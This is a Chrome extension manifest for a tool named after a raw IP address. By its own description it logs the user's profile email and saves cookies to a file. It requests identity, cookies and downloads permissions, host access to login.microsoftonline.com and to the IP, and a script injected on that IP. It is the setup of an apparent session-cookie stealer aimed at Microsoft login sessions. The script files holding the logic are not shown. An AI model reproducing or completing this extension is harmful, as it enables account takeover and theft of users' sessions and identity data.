{
  "manifest_version": 3,
  "name": "196.251.121.49 Profile Logger",
  "version": "1.3",
  "description": "Logs profile email and saves cookies to stv.txt",
  "permissions": [
    "identity", 
    "cookies",
    "downloads"
  ],
  "host_permissions": [
    "http://196.251.121.49/*", 
    "*://*.login.microsoftonline.com/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["http://196.251.121.49/*"],
      "js": ["content.js"]
    }
  ]
}
